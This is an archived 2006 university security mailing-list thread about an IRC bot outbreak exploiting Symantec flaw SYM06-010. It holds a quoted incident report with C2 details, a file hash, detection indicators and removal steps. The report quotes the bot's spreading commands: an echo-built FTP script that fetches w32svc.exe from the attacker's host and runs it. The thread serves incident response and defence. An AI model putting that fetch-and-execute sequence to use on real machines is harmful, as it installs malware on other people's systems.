[unisog] More: Bot outbreak exploiting SYM06-010

Robin Stubbs mstubbs at facstaff.wisc.edu
Tue Nov 28 14:34:18 GMT 2006


Thanks so much for posting this, all of you who have shared info on this.

Someone here told me that this defect only affects managed installations. 
Can someone verify that? I am concerned that Symantec does not state that so
am wondering if that is true.

Secondly is it the case there are no patches for this? So if someone has a vulnerable
version they have to uninstall it and install a new version? I would really not want to 
rely on an antivirus product getting the upperhand when the virus is already getting 
onto the system. 

----- Original Message -----
From: "H. Morrow Long" <>
Date: Tuesday, November 28, 2006 8:12 am
Subject: Re: [unisog] More: Bot outbreak exploiting SYM06-010
To: UNIversity Security Operations Group <unisog at lists.dshield.org>


> Symantec sent out a bulletin to their Platinum
> customers last night detailing that there was a
> new version of the W32.Spybot worm exploiting
> SYM06-010 and pointing them to the malware
> description web page :
> 
>   http://www.symantec.com/avcenter/security/Content/2006.05.25.html
> 
> It says that signature files #61675 and later
> will be available today (11/28) with the sig
> of the new variant.
> 
> - H. Morrow Long, CISSP, CISM, CEH
>    University Information Security Officer
>    Director -- Information Security Office
>    Yale University, ITS
> 
> 
> 
> On Nov 28, 2006, at 12:09 AM, Liu, David wrote:
> 
> > Any idea on if the malware info has been m,ade public on the Symantrec
> > site?
> >
> > -----Original Message-----
> > From: unisog-bounces at lists.dshield.org
> > [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
> > Sent: Monday, November 27, 2006 7:02 PM
> > To: UNIversity Security Operations Group
> > Subject: [unisog] More: Bot outbreak exploiting SYM06-010
> >
> > We had a number of hosts become infected with an IRC bot today that  
> 
> > used
> > www.flackware.info as the Command and Control. Here is information  
> 
> > that
> > I know so far:
> >
> > ===================
> > Command and Control
> > ===================
> > . www.flackware.info:6667/tcp (the only apparent name/port used)
> > . (auto)JOIN #text airforce
> >
> > =========
> > File Info
> > =========
> > . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
> > . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
> > . Symantec definitions 11/27/2006 rev.50 and later will detect it as 
> a
> > Spybot variant
> >
> > =============
> > How to Obtain
> > =============
> > The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
> > spread. When it compromises a machine, it executes the following
> > commands:
> >
> > echo open (ip address of attacker) (ftp server port) > i
> > echo user 1 1 >> i
> > echo get w32svc.exe >> i
> > echo quit >> i
> > ftp -As:i
> > w32svc.exe
> > exit
> >
> > ========
> > When Run
> > ========
> > . Installs itself to %WINDIR%\w32svc.exe
> > . Sets Windows File Protection to "Scan only at bootup"
> > . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
> > and backup.tftp
> > . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
> > . Attempts to connect to the Command and Control server
> > . Installs itself as a service in many places within the registry
> >
> > =================
> > Infection Vectors
> > =================
> > . Almost certainly via SYM06-010
> > . Almost certainly other Windows vulnerabilities (since patched)
> >
> > ==============================
> > Detecting Infections - Network
> > ==============================
> > . Looking for DNS queries for www.flackware.info
> > . Looking for network traffic to port 6667/tcp going to the IP address
> > for www.flackware.info
> > . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
> >
> > =======================================
> > Identifying Infection - At the Computer
> > =======================================
> > . Look for %WINDIR%\w32svc.exe
> > . Look for a Service called "Windows Network Firewall"
> >
> > =======
> > Removal
> > =======
> > Symantec definitions 11/27/2006 rev.50 performed admirably on my test
> > box. Assuming the host did not have any other malware loaded onto it
> > after infection, updating the AV defs to that "rev" or later, scanning
> > the hard drive, then rebooting when prompted should do the trick.
> >
> > Manual Removal: Set the "Windows Network Firewall" service to
> > "Disabled", and reboot (you can't stop the service while it is  
> > running).
> > Delete the w32svc.exe file, and preferably, remove the associated
> > (dozens of) registry keys.
> >
> > Brian
> >
> > -- 
> > Brian Eckman, Security Analyst
> > University of Minnesota
> > Office of Information Technology
> > Security & Assurance
> >
> >
> > _______________________________________________
> > unisog mailing list
> > unisog at lists.dshield.org
> > https://lists.sans.org/mailman/listinfo/unisog
> >
> > _______________________________________________
> > unisog mailing list
> > unisog at lists.dshield.org
> > https://lists.sans.org/mailman/listinfo/unisog
> 
> _______________________________________________
> unisog mailing list
> unisog at lists.dshield.org
> https://lists.sans.org/mailman/listinfo/unisog


More information about the unisog mailing list